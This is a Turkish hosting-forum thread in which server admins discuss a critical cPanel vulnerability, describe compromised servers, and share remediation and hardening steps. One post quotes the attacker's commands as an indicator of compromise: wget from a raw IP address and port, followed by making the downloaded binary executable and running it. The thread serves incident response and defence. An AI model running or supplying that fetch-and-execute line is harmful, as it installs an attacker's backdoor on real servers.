0
Kayıt Ol

cPanel - Kritik Güvenlik Zafiyeti

21

3.606

  • 30-04-2026, 18:05:36
    #19
    KeyTech
    KeyTech
    nuclear.x86 ya ek olarak wget http://45.143.167.96:37236/outfile
    chmod +x outfile
    ./outfile

    de çalıştırılmış bazı sunucularımda ssh key ve root yetkili kullanıcılarda eklendiğini gördüm. Yani sadece cpaneli güncellemek yetmez
  • 30-04-2026, 18:53:25
    #20
    Seobaz
    Seobaz

    Biz Ne Yaşadık?


    Sunucumuzda IOC taraması yaptığımızda 17 adet compromised session tespit ettik:
    • Birden fazla cPanel hesabında session injection bulundu
    • Session dosyalarında multi-line pass value (şifre alanına kod enjeksiyonu) tespit edildi
    • Saldırganlar WHM'ye girdikten sonra:
      • MySQL kullanıcılarını silmişler → Siteler DB bağlantısı koparak çöktü (HTTP 500)
      • SSH key'leri enjekte etmişler → Sunucuya kalıcı arka kapı açmaya çalışmışlar
      • Web sunucusu config dosyasını bozmuşlar → Siteler düzgün çalışmaz hale geldi
    Birden fazla sitemiz aynı anda çöktü. İlk başta neden anlaşılmıyordu, sonra CVE duyurusuyla her şey netleşti.

    Nasıl Müdahale Ettik?


    Tespit:
    • cPanel IOC detection script'i ile compromised session'lar bulundu
    • Birden fazla sitede DB kullanıcısı silinmiş (Access denied hataları)
    • Root SSH key'lerine yetkisiz ekleme yapılmış
    • Web sunucusu config'i bozulmuş
    Acil Müdahale:
    • Tüm session dosyaları temizlendi
    • cPanel yamalı versiyona güncellendi
    • Yetkisiz SSH key'leri silindi
    • SSH portu değiştirildi
    • WHM ve SSH portları firewall'da herkese kapatıldı, sadece güvenilir IP'ler whitelist'e alındı
    • Web sunucusu config'i backup'tan restore edildi
    • Silinen MySQL kullanıcıları yeniden oluşturuldu
    Kalıcı Önlemler:
    • Firewall'da WHM ve SSH portları genel erişime kapatıldı
    • IP değişikliğine karşı web tabanlı otomatik rescue/whitelist sistemi kuruldu
    • Geçici IP'ler 1 saatte bir otomatik temizleniyor
    • Komple sunucu yedeği AWS S3'e alındı
    • Kullanılmayan PHP versiyonları kaldırıldı

    Siz Ne Yapmalısınız?


    1. Güncelle
    /scripts/upcp --force
/usr/local/cpanel/cpanel -V
/scripts/restartsrv_cpsrvd
    2. IOC Taraması Yap
    cPanel'in yayınladığı detection script'ini çalıştırın. INDICATORS OF COMPROMISE DETECTED çıktısı alıyorsanız sunucunuza girilmiş demektir.

    3. Session Temizliği
    rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/preauth/*
    4. Güncelleme Yapamıyorsanız
    WHM portlarını firewall'dan kapatın veya cpsrvd'yi durdurun:
    whmapi1 configureservice service=cpsrvd enabled=0 monitored=0
/scripts/restartsrv_cpsrvd --stop
    5. Güncelleme Sonrası Kontrol Listesi
    • Root ve tüm WHM/cPanel şifrelerini değiştirin
    • SSH authorized_keys dosyalarını kontrol edin — tanımadığınız key varsa silin
    • MySQL kullanıcılarını kontrol edin — siteniz 500 veriyorsa DB kullanıcısı silinmiş olabilir
    • Cron job'ları kontrol edin — zararlı cron eklenmiş olabilir
    • WHM/SSH erişimini firewall ile sadece güvenilir IP'lere kısıtlayın
    • WordPress ve uygulama admin şifrelerini yenileyin
    • Komple sunucu yedeği alın
  • 30-04-2026, 22:28:55
    #21
    zaValli
    zaValli
    Hack yiyen sunucum yedekleri tekrar alıp güncellemeleri yaptıktan sonra tekrar hack yedi.
  • 30-04-2026, 22:46:05
    #22
    Toplam
    Toplam
    Eğer bir saldırıya uğradıysanız yedeklerinizi mevcut sunucudaki servis sorunlarını çözüp geri yüklemek yerine işletim sistemi seviyesinde sıfır kurulum (Os + cPanel reinstall) sonrası Back-Up dosyalarını Restore etmeniz çok daha mantıklı olacaktır.